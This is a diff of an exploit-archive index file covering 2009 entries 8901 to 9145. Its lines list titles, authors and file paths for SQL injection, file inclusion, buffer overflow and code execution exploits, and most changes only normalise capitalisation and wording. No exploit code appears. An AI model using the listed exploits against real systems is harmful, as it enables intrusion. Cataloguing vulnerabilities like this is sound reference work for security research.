+8901,platforms/php/webapps/8901.txt,"virtue news (sql/xss) Multiple Vulnerabilities",2009-06-08,Snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 Insecure Cookie Handling Vulnerability",2009-06-08,"ThE g0bL!N",php,webapps,0 -8904,platforms/php/webapps/8904.txt,"Automated Link Exchange Portal 1.3 Multiple Remote Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 +8904,platforms/php/webapps/8904.txt,"automated link exchange portal 1.3 Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 8905,platforms/php/webapps/8905.txt,"Joomla Component com_portafolio (cid) SQL injection Vulnerability",2009-06-08,"Chip D3 Bi0s",php,webapps,0 8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 Remote SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 8907,platforms/multiple/remote/8907.txt,"Apple Safari <= 3.2.x (XXE attack) Local File Theft Vulnerability",2009-06-09,"Chris Evans",multiple,remote,0 @@ -8408,7 +8408,7 @@ id,file,description,date,author,platform,type,port 8914,platforms/php/webapps/8914.txt,"S-CMS <= 2.0b3 Multiple SQL Injection Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 8915,platforms/php/webapps/8915.pl,"S-CMS <= 2.0b3 (username) Blind SQL Injection Exploit",2009-06-09,YEnH4ckEr,php,webapps,0 8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 (Control Server) Remote BOF Exploit",2009-06-09,His0k4,windows,remote,80 -8917,platforms/php/webapps/8917.txt,"MRCGIGUY The Ticket System 2.0 PHP Multiple Remote Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 +8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 php Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links (report.php id) Remote SQL Injection Vulnerability",2009-06-09,"ThE g0bL!N",php,webapps,0 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 @@ -8417,38 +8417,38 @@ id,file,description,date,author,platform,type,port 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-06-10,N@bilX,php,webapps,0 -8926,platforms/php/webapps/8926.txt,"MRCGIGUY FreeTicket (CH/SQL) Multiple Remote Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 +8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket (ch/sql) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 (username) Blind SQL Injection Exploit",2009-06-10,YEnH4ckEr,php,webapps,0 8928,platforms/php/webapps/8928.txt,"phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog <= 1.2 Beta Multiple Remote SQL Injection Vulnerabilities",2009-06-11,YEnH4ckEr,php,webapps,0 8930,platforms/windows/remote/8930.txt,"ModSecurity <= 2.5.9 (Core Rules <= 2.5-1.6.1) Filter Bypass Vuln",2009-06-11,"Lavakumar Kuppan",windows,remote,0 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0 -8932,platforms/php/webapps/8932.txt,"Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 +8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/sql injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0 -8937,platforms/php/webapps/8937.txt,"Campus Virtual-LMS (XSS/SQL Injection) Multiple Remote Vulnerabilities",2009-06-12,YasiĂ³n,php,webapps,0 +8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/sql injection) Multiple Vulnerabilities",2009-06-12,YasiĂ³n,php,webapps,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 8939,platforms/php/webapps/8939.pl,"phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 -8941,platforms/php/webapps/8941.txt,"Pivot 1.40.4-7 Multiple Remote Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8942,platforms/php/webapps/8942.txt,"TBDev 01-01-2008 Multiple Remote Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8943,platforms/php/webapps/8943.txt,"TransLucid 1.75 Multiple Remote Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8943,platforms/php/webapps/8943.txt,"translucid 1.75 Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln",2009-06-15,ByALBAYX,php,webapps,0 -8947,platforms/php/webapps/8947.txt,"Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities",2009-06-15,SirGod,php,webapps,0 +8947,platforms/php/webapps/8947.txt,"impleo music collection 2.0 (sql/xss) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e Remote Code Execution Vulnerability",2009-06-15,USH,php,webapps,0 -8950,platforms/php/webapps/8950.txt,"FormMail 1.92 Multiple Remote Vulnerabilities",2009-06-15,USH,php,webapps,0 +8950,platforms/php/webapps/8950.txt,"formmail 1.92 Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 Remote Command Execution Exploit",2009-06-15,SirGod,php,webapps,0 8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability",2009-06-15,SirGod,php,webapps,0 -8953,platforms/php/webapps/8953.txt,"Elvin BTS 1.2.0 Multiple Remote Vulnerabilities",2009-06-15,SirGod,php,webapps,0 -8954,platforms/php/webapps/8954.txt,"AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities",2009-06-15,SirGod,php,webapps,0 +8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 +8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 (lfi/sql) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 (syslog) Denial of Service Exploit",2009-06-15,h00die,linux,dos,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 8957,platforms/multiple/dos/8957.txt,"Apple Safari & Quicktime Denial of Service Vulnerability",2009-06-15,"Thierry Zoller",multiple,dos,0 -8958,platforms/php/webapps/8958.txt,"TorrentTrader Classic 1.09 Multiple Remote Vulnerabilities",2009-06-15,waraxe,php,webapps,0 +8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla Component com_ijoomla_rss Blind SQL Injection Exploit",2009-06-15,"Mehmet Ince",php,webapps,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability",2009-06-15,Kacper,php,webapps,0 @@ -8472,18 +8472,18 @@ id,file,description,date,author,platform,type,port 8981,platforms/php/webapps/8981.txt,"phportal 1.0 Insecure Cookie Handling Vulnerability",2009-06-17,KnocKout,php,webapps,0 8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 -8984,platforms/php/webapps/8984.txt,"CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 +8984,platforms/php/webapps/8984.txt,"cms buzz (xss/pc/hi) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method Vuln",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability",2009-06-22,Qabandi,php,webapps,0 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server Low Bandwidth Denial of Service #2",2009-06-22,evilrabbi,multiple,dos,0 8992,platforms/php/webapps/8992.php,"pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit",2009-06-22,"Hacking Expose!",php,webapps,0 -8993,platforms/php/webapps/8993.txt,"Elgg (XSS/CSRF/Change Password) Multiple Remote Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 +8993,platforms/php/webapps/8993.txt,"elgg (xss/csrf/change password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x Insecure Cookie Vulnerability",2009-06-22,TiGeR-Dz,php,webapps,0 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 Multiple Remote File Inclusion Vulnerabilities",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability",2009-06-22,Lo$er,php,webapps,0 -8997,platforms/php/webapps/8997.txt,"Kasseler CMS (FD/XSS) Multiple Remote Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 +8997,platforms/php/webapps/8997.txt,"kasseler cms (fd/xss) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 8998,platforms/php/webapps/8998.txt,"Sourcebans <= 1.4.2 Arbitrary Change Admin Email Vulnerability",2009-06-22,"Mr. Anonymous",php,webapps,0 8999,platforms/php/webapps/8999.txt,"Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln",2009-06-22,"Chip D3 Bi0s",php,webapps,0 9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 (key) Remote SQL Injection Vulnerability",2009-06-22,Mr.tro0oqy,php,webapps,0 @@ -8497,7 +8497,7 @@ id,file,description,date,author,platform,type,port 9009,platforms/php/webapps/9009.txt,"BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-24,"Tim Medin",php,webapps,0 9010,platforms/php/webapps/9010.txt,"Glossword <= 1.8.11 (index.php x) Local File Inclusion Vulnerability",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla Component com_pinboard Remote File Upload Vulnerability",2009-06-24,ViRuSMaN,php,webapps,0 -9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c (XSS/LFI) Multiple Remote Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0 +9012,platforms/php/webapps/9012.txt,"tribiq cms 5.0.12c (xss/lfi) Multiple Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0 9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability",2009-06-24,JosS,php,webapps,0 9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability",2009-06-24,JosS,php,webapps,0 9016,platforms/php/webapps/9016.txt,"Joomla Component com_amocourse (catid) SQL Injection Vuln",2009-06-24,"Chip D3 Bi0s",php,webapps,0 @@ -8523,24 +8523,24 @@ id,file,description,date,author,platform,type,port 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability",2009-06-29,ahmadbady,php,webapps,0 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability",2009-06-29,"ThE g0bL!N",php,webapps,0 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 -9039,platforms/multiple/remote/9039.txt,"Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)",2009-06-29,SecurityRules,multiple,remote,0 +9039,platforms/multiple/remote/9039.txt,"Cpanel - (lastvisit.html domain) Arbitrary File Disclosure Vulnerability (auth)",2009-06-29,SecurityRules,multiple,remote,0 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip (book_id) Remote SQL Injection Vulnerability",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory (file) Remote File Disclosure Vulnerability",2009-06-29,"ThE g0bL!N",php,webapps,0 9042,platforms/php/webapps/9042.pl,"Newsolved 1.1.6 (login grabber) Multiple SQL Injection Exploit",2009-06-29,jmp-esp,php,webapps,0 9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln",2009-06-29,Septemb0x,php,webapps,0 -9044,platforms/php/webapps/9044.txt,"DM FileManager 3.9.4 Remote File Inclusion Vulnerability",2009-06-29,Septemb0x,php,webapps,0 +9044,platforms/php/webapps/9044.txt,"dm filemanager 3.9.4 - Remote File Inclusion Vulnerability",2009-06-29,Septemb0x,php,webapps,0 9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 9048,platforms/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability",2009-06-30,Stack,php,webapps,0 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 Remote File Disclosure Vulnerability",2009-06-30,Stack,php,webapps,0 -9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 Blind SQL Injection Exploit",2009-06-30,eLwaux,php,webapps,0 -9051,platforms/php/webapps/9051.txt,"Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability",2009-06-30,ahmadbady,php,webapps,0 +9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection Exploit",2009-06-30,eLwaux,php,webapps,0 +9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion Vulnerability",2009-06-30,ahmadbady,php,webapps,0 9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability",2009-06-30,SirGod,php,webapps,0 -9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 Blind SQL Injection Vulnerability",2009-06-30,eLwaux,php,webapps,0 +9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection Vulnerability",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod <= 1.1 Remote Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook <= 2.1 Remote SQL Injection Vulnerability",2009-06-30,Dante90,php,webapps,0 -9057,platforms/php/webapps/9057.txt,"TSEP <= 0.942.02 Multiple Remote Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 -9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 +9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 +9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b (.M3U File) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 @@ -8550,8 +8550,8 @@ id,file,description,date,author,platform,type,port 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln",2009-07-01,Septemb0x,hardware,remote,0 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit",2009-07-01,Stack,hardware,dos,0 -9068,platforms/php/webapps/9068.txt,"KerviNet Forum <= 1.1 Multiple Remote Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 -9069,platforms/php/webapps/9069.txt,"CMS Chainuk <= 1.2 Multiple Remote Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 +9068,platforms/php/webapps/9068.txt,"kervinet forum <= 1.1 Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 +9069,platforms/php/webapps/9069.txt,"cms chainuk <= 1.2 Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 (.pls) Local Buffer Overflow Exploit (SEH)",2009-07-01,Stack,windows,local,0 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x JavaScript Reload Remote Crash Exploit",2009-07-02,SkyOut,multiple,dos,0 9072,platforms/multiple/local/9072.txt,"Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit",2009-07-02,"Sumit Siddharth",multiple,local,0 @@ -8565,7 +8565,7 @@ id,file,description,date,author,platform,type,port 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 -9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.* Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffiĂ© ",windows,dos,0 +9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffiĂ© ",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,Kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 @@ -8573,21 +8573,21 @@ id,file,description,date,author,platform,type,port 9089,platforms/php/webapps/9089.txt,"ClearContent (image.php url) RFI/LFI Vulnerability",2009-07-09,MizoZ,php,webapps,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC",2009-07-09,hack4love,windows,dos,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 Remote Blind SQL Injection Exploit",2009-07-09,Qabandi,php,webapps,0 -9092,platforms/php/webapps/9092.txt,"WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 -9093,platforms/windows/remote/9093.txt,"Windows Live Messenger Plus! FileServer 1.0 Directory Traversal Vuln",2009-07-09,joepie91,windows,remote,0 +9092,platforms/php/webapps/9092.txt,"webasyst shop-script (bsql/xss) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 +9093,platforms/windows/remote/9093.txt,"windows live messenger plus! fileserver 1.0 - Directory Traversal vuln",2009-07-09,joepie91,windows,remote,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite (Id) Remote SQL Injection Vulnerability",2009-07-09,BazOka-HaCkEr,php,webapps,0 -9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 Multiple Remote Vulnerabilities",2009-07-09,JiKo,php,webapps,0 +9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 Multiple Vulnerabilities",2009-07-09,JiKo,php,webapps,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 JSP Source Viewing Vulnerability",2009-07-09,Kingcope,windows,remote,0 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 Arbitrary File Disclosure Symlink Attack Vulnerability",2009-07-09,Kingcope,multiple,local,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x SQL Injection/phpinfo() Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer (AddFavorite) Remote Crash PoC",2009-07-09,Sberry,windows,dos,0 -9101,platforms/php/webapps/9101.txt,"phpBMS 0.96 Multiple Remote Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 +9101,platforms/php/webapps/9101.txt,"phpbms 0.96 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 -9103,platforms/php/webapps/9103.txt,"GenCMS 2006 Multiple Remote Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 +9103,platforms/php/webapps/9103.txt,"gencms 2006 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0 -9106,platforms/windows/remote/9106.txt,"Citrix XenCenterWeb (XSS/SQL/RCE) Multiple Remote Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 +9106,platforms/windows/remote/9106.txt,"citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0 9108,platforms/windows/remote/9108.py,"MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 SQL Injection Vulnerability/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 @@ -8599,7 +8599,7 @@ id,file,description,date,author,platform,type,port 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 Remote Database Disclosure Vulnerability",2009-07-10,darkjoker,php,webapps,0 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player (WindsPly.ocx) Remote BOF PoC",2009-07-10,shinnai,windows,dos,0 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service Directory Traversal Vuln",2009-07-10,"Alberto Tablado",hardware,remote,0 -9118,platforms/php/webapps/9118.txt,"Ebay Clone 2009 (XSS/bSQL) Multiple Remote Vulnerabilities",2009-07-10,Moudi,php,webapps,0 +9118,platforms/php/webapps/9118.txt,"ebay clone 2009 (xss/bsql) Multiple Vulnerabilities",2009-07-10,Moudi,php,webapps,0 9119,platforms/php/webapps/9119.txt,"LionWiki (index.php page) Local File Inclusion Vulnerability",2009-07-10,MoDaMeR,php,webapps,0 9121,platforms/php/webapps/9121.php,"Morcego CMS <= 1.7.6 Remote Blind SQL Injection Exploit",2009-07-10,darkjoker,php,webapps,0 9122,platforms/php/webapps/9122.txt,"Opial 1.0 Arbitrary File Upload/XSS/SQL Injection Vulnerabilities",2009-07-11,LMaster,php,webapps,0 @@ -8609,8 +8609,8 @@ id,file,description,date,author,platform,type,port 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client (response) Remote BOF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 -9129,platforms/php/webapps/9129.txt,"Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 -9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free version 1.0.5 Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0 +9129,platforms/php/webapps/9129.txt,"censura 1.16.04 (bsql/xss) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 +9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free version 1.0.5 - Remote File Disclosure Vuln",2009-07-12,IRCRASH,php,webapps,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0 9132,platforms/php/webapps/9132.py,"RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 Local Crash Vulnerability Exploit",2009-07-13,prodigy,windows,dos,0 @@ -8622,13 +8622,13 @@ id,file,description,date,author,platform,type,port 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center (.wav File) Crash Exploit",2009-07-14,prodigy,windows,remote,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar (DJcalendar.cgi TEMPLATE) File Disclosure Vuln",2009-07-14,cibbao,cgi,webapps,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 (.ICP File) Local Stack Overflow PoC",2009-07-14,"ThE g0bL!N",windows,dos,0 -9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr Local buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 +9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z .Mpr - Local buffer Overflow Exploit",2009-07-14,n00b,windows,local,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure Vulnerability",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 Remote Blind SQL 